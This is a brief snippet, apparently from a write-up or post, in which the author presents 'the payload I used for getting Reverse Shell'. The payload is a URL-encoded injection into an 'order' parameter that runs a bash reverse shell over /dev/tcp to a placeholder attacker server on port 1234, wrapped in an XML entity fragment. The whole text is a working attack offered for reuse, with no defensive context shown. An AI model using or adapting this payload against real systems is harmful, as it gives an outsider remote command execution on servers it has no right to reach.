This is the payload I used for getting Reverse Shell:
```

/rss.xml&order=id%2Cid%29%3B%7D%3Bsystem('bash+-c+%22sh+-i+%3E%26+%2Fdev%2Ftcp%2F<Your-Server-IP>%2F1234+0%3E%261%22')%3B//">]>

<name>&xx;;</name>
```